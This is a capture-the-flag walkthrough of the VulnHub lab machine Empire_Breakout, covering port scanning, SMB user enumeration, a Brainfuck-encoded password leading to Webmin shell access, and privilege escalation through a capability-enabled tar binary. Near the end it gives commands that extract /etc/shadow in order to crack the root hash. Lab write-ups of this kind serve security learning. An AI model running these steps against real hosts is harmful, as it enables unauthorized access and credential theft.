Empire_Breakout is a lightweight VulnHub machine that mixes web enumeration, Git leakage, weak encoding, and Linux capabilities for privilege escalation. The foothold is obtained by discovering an encoded password inside the Apache default page and validating users via SMB enumeration. Privilege escalation is achieved through misconfigured Linux capabilities that allow reading sensitive files.
Target: 10.10.10.8
Initial vector: encoded password in Apache page → Webmin console
Privilege escalation: Linux capabilities → read protected files
$ sudo nmap -p- --open -sS --min-rate=5000 -n -Pn -vvv 10.10.10.8 -oG Ports.txt
$ sudo nmap -p80,139,445,10000,20000 -sCV 10.10.10.8 -oN Services.txt
Key findings:
The default Apache “It works” page contains an encoded string. The encoding is **Brainfuck**, a common CTF trick.
Decoding reveals a password. To identify the user, enumerate SMB:
$ enum4linux 10.10.10.8 | tee output_enum4linux.txt
With the username and decoded password, log into Webmin:
https://10.10.10.8:20000/
Webmin provides a built‑in shell:
https://10.10.10.8:20000/shell
This gives direct command execution on the host.
Enumerate capabilities:
$ getcap -r / 2>/dev/null
A binary owned by a low‑privileged user has extended capabilities, allowing it to read arbitrary files —
including /etc/shadow and even /root.
Example exploitation:
$ cd /etc $ /home/cyber/tar -czf /tmp/shadow.tar.gz shadow $ cd /tmp $ /home/cyber/tar -xzf shadow.tar.gz
Once /etc/shadow is extracted, crack the root hash or read other sensitive files directly.
This leads to full root compromise.
Empire_Breakout is a short but interesting machine: a Brainfuck‑encoded password hidden in the Apache page, SMB enumeration to identify users, Webmin shell access, and a misconfigured capability‑enabled binary that allows reading protected files. A clean demonstration of how small misconfigurations can escalate into full system compromise.